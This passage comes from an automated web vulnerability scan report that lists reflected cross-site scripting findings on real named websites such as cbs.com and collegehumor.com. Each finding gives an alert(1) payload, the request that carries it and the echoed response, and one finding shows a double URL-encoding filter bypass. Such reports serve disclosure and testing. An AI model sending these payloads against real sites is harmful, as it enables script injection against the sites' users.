Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.1.10.1298901533

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:00:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15800
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/Index.asp?800c2"><script>alert(1)</script>5405092905c=1" rel="nofollow">
...[SNIP]...

3.26. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c429f"><script>alert(1)</script>5947cca3a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22?c429f"><script>alert(1)</script>5947cca3a97=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 13:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11704
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=JBMEPKABJLJNPNOAGJMKEJLC; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22&c429f"><script>alert(1)</script>5947cca3a97=1" rel="nofollow">
...[SNIP]...

3.27. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /44/811103/1/attorneys/dallas.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92880"><script>alert(1)</script>93b4e678caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /44/811103/1/attorneys/dallas.aspx?92880"><script>alert(1)</script>93b4e678caa=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/cat/44/1/37711/dallas.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.3.10.1298901533

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:00:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 26404
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ATTORNEYS - DALLAS</title>
<meta name="description" content="
...[SNIP]...
<a href="http://www.bizfind.us/ricerca.asp?idregione=44&ateco=811103&pg=1&idcatul=attorneys&idcomune1=dallas&92880"><script>alert(1)</script>93b4e678caa=1" rel="nofollow">
...[SNIP]...

3.28. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /cat/44/1/37711/dallas.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dd5"><script>alert(1)</script>f358a02dbe3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cat/44/1/37711/dallas.aspx?c4dd5"><script>alert(1)</script>f358a02dbe3=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:00:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 54980
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>DALLAS popular categories</title>
<meta name="description" co
...[SNIP]...
<a href="http://www.bizfind.us/categorie.asp?idregione=44&pg=1&istat=37711&idcomune1=dallas&c4dd5"><script>alert(1)</script>f358a02dbe3=1" rel="nofollow">
...[SNIP]...

3.29. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b19c"><script>alert(1)</script>024d21d7b1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6b19c"><script>alert(1)</script>024d21d7b1a=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 103304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
<link rel="canonical" href="http://www.bloggingstocks.com/?6b19c"><script>alert(1)</script>024d21d7b1a=1"/>
...[SNIP]...

3.30. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloggingstocks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94527"-alert(1)-"1130af21a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?94527"-alert(1)-"1130af21a60=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 103202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
s.pf";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,bloggingstocks.com";
s_265.mmxgo = true;
s_265.prop1="BloggingStocks";
s_265.prop2="Home";
s_265.prop12="http://www.bloggingstocks.com/?94527"-alert(1)-"1130af21a60=1";
s_265.prop16="BloggingStocks";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.31. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /primetime/big_bang_theory/video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8b2e"-alert(1)-"c286caefd26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /primetime/big_bang_theory/video/?f8b2e"-alert(1)-"c286caefd26=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
X-Real-Server: ws3175.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Mon, 28 Feb 2011 13:34:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:34:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Mon, 28-Feb-2011 14:34:40 GMT
Set-Cookie: video_section=Default; expires=Mon, 28-Feb-2011 14:34:40 GMT
Content-Length: 85574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!-- SEO Begin -->
   <m
...[SNIP]...
/705/159/CBS_BIGBANG_417_IMAGE_CIAN_140x80.jpg",
       title: "The Big Bang Theory - The Toast Derivation",
       message: 'Cool message here',
       backLink: "http://www.cbs.com/primetime/big_bang_theory/video/?f8b2e"-alert(1)-"c286caefd26=1", //when clicked on title
       description: "Sheldon struggles to cope when he realizes it\'s actually Leonard who is the center of their social group.",
       status: '',
       actionLinkText: "More videos",

...[SNIP]...

3.32. http://www.chamonix.com/press,104,en.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chamonix.com
Path:   /press,104,en.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19939"><script>alert(1)</script>417c8bc064a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press,104,en.html?19939"><script>alert(1)</script>417c8bc064a=1 HTTP/1.1
Host: www.chamonix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48422

...<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org
...[SNIP]...
<form name="formulaireconnection" action="/press,104,en.html?19939"><script>alert(1)</script>417c8bc064a=1" method="post" onSubmit="return testformconnection();" style="margin:0px;padding:0px">
...[SNIP]...

3.33. http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cheatscodesguides.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a081"-alert(1)-"be8f1205899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a081"-alert(1)-"be8f1205899=1 HTTP/1.1
Host: www.cheatscodesguides.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:34:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:34:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: NGUserID=a016c07-25282-1191953866-2;Path=/;Domain=.cheatscodesguides.com;Expires=Tue, 27-Aug-30 13:34:41 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: freq=c-1298900081420v-1n-23mc+1298900081420mv+1mn+23wwe~0;Path=/;Domain=.cheatscodesguides.com
Content-Length: 59559


<html><head>
<link rel="stylesheet" href="http://media.cheatscodesguides.com/ccg/css/ccg.css" type="text/css">
<title>Cheats, Codes and Guides</title>
<meta name="description" content="HUGE colle
...[SNIP]...
if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.cheatscodesguides.com/?4a081"-alert(1)-"be8f1205899=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

3.34. http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cheatscodesguides.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82cec"><script>alert(1)</script>c75a97fd7b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?82cec"><script>alert(1)</script>c75a97fd7b0=1 HTTP/1.1
Host: www.cheatscodesguides.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:34:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:34:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: NGUserID=a016c04-15264-1265047864-1;Path=/;Domain=.cheatscodesguides.com;Expires=Tue, 27-Aug-30 13:34:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: freq=c-1298900080432v-1n-23mc+1298900080432mv+1mn+23wwe~0;Path=/;Domain=.cheatscodesguides.com
Content-Length: 59711


<html><head>
<link rel="stylesheet" href="http://media.cheatscodesguides.com/ccg/css/ccg.css" type="text/css">
<title>Cheats, Codes and Guides</title>
<meta name="description" content="HUGE colle
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.cheatscodesguides.com/?82cec"><script>alert(1)</script>c75a97fd7b0=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

3.35. http://www.chmedia.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chmedia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca889"-alert(1)-"00638fcc054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ca889"-alert(1)-"00638fcc054=1 HTTP/1.1
Host: www.chmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:35:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Sun, 28-Feb-2010 13:35:04 GMT; path=/; domain=chmedia.com
Set-Cookie: jument_hash=f3770dd1f6e47cbbbde90174c3568b22fe7250b0; expires=Sun, 28-Feb-2016 18:38:55 GMT; path=/; domain=chmedia.com
Set-Cookie: jument_hash=f3770dd1f6e47cbbbde90174c3568b22fe7250b0; expires=Sun, 28-Feb-2016 18:38:55 GMT; path=/; domain=chmedia.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>CH Med
...[SNIP]...
e":"none","rating":"unrated","ctype":"other"};
       jument.ad_site = "";
       jument.cookie.domain = "chmedia.com";
       jument.home_url = "http://www.chmedia.com";
       jument.this_url = "http://www.chmedia.com/?ca889"-alert(1)-"00638fcc054=1";
       jument.user_id = 0;
           </script>
...[SNIP]...

3.36. http://www.cofrac.fr/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cofrac.fr
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23ed8"-alert(1)-"3a0b70bc101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23ed8"-alert(1)-"3a0b70bc101=1 HTTP/1.1
Host: www.cofrac.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.2
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:34:16 GMT
Connection: close
Content-Length: 20081


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<base href="http://www.cofrac.fr/site/content/french/pages/home/">
<
...[SNIP]...
<script language="javascript">
   var file_exists=true;
   var directory="home";
   var path="index.php";
   var extra_parameters="?23ed8"-alert(1)-"3a0b70bc101=1";

</script>
...[SNIP]...

3.37. http://www.collegehumor.com/cutecollegegirl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /cutecollegegirl

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2427'-alert(1)-'98361b723e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cutecollegegirlf2427'-alert(1)-'98361b723e HTTP/1.1
Host: www.collegehumor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:34:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ch_hash=deleted; expires=Sun, 28-Feb-2010 13:34:43 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=7541ddc3340e0dd511fa4a2051adaf8a4379c742; expires=Sat, 27-Feb-2016 13:34:44 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=7541ddc3340e0dd511fa4a2051adaf8a4379c742; expires=Sat, 27 Feb 2016 13:34:44 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: returning_user=deleted; expires=Sun, 28-Feb-2010 13:34:43 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Wed, 30-Mar-2011 13:34:44 GMT; path=/; domain=.collegehumor.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 48629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
var jument = window.jument || {};
jument.cookie.domain = '.collegehumor.com';

var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/cutecollegegirlf2427'-alert(1)-'98361b723e';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2N1dGVjb2xsZWdlZ2lybGYyNDI3Jy1hbGVydCgxKS0nOTgzNjFiNzIzZQ==';
ch.home_url = 'http://www.collegehumor.com/';
ch.user_id = false;

...[SNIP]...

3.38. http://www.collegehumor.com/cutecollegegirl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /cutecollegegirl

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec092'-alert(1)-'387554248b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cutecollegegirl?ec092'-alert(1)-'387554248b0=1 HTTP/1.1
Host: www.collegehumor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ch_hash=deleted; expires=Sun, 28-Feb-2010 13:34:40 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=18feb99eb9d4244c0c57520f61d37a7bf7fcc7b2; expires=Sat, 27-Feb-2016 13:34:41 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=18feb99eb9d4244c0c57520f61d37a7bf7fcc7b2; expires=Sat, 27 Feb 2016 13:34:41 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: returning_user=deleted; expires=Sun, 28-Feb-2010 13:34:40 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Wed, 30-Mar-2011 13:34:41 GMT; path=/; domain=.collegehumor.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
ar jument = window.jument || {};
jument.cookie.domain = '.collegehumor.com';

var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/cutecollegegirl?ec092'-alert(1)-'387554248b0=1';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2N1dGVjb2xsZWdlZ2lybD9lYzA5MictYWxlcnQoMSktJzM4NzU1NDI0OGIwPTE=';
ch.home_url = 'http://www.collegehumor.com/';
ch.user_id = fals
...[SNIP]...

3.39. http://www.csoonline.com/module.htm [leadTaxonomy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /module.htm

Issue detail

The value of the leadTaxonomy request parameter is copied into the HTML document as plain text between tags. The payload ccca8%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec68746d9450 was submitted in the leadTaxonomy parameter. This input was echoed as ccca8<img src=a onerror=alert(1)>c68746d9450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /module.htm?moduleType=article_comments&contentId=486324&taxonomyId=41193&leadTaxonomy=securityccca8%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec68746d9450&ajax=true&outputFormat=json HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
X-Prototype-Version: 1.5.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:28 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:02:10 GMT;path=/
Cache-Control: private
Content-Length: 1771

{"comments":"<link href=\"http:\/\/comments.csoonline.com\/themes\/CIO.com\/style.css\" rel=\"stylesheet\" type=\"text\/css\" media=\"screen\" \/><a id=\"comment\"><\/a>\n<a id=\"comment-10368\"><\/
...[SNIP]...
<a href=\"http:\/\/comments.csoonline.com\/node\/486324&topic=securityccca8<img src=a onerror=alert(1)>c68746d9450\">
...[SNIP]...

3.40. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b822"-alert(1)-"057c5998ce7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6b822"-alert(1)-"057c5998ce7=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
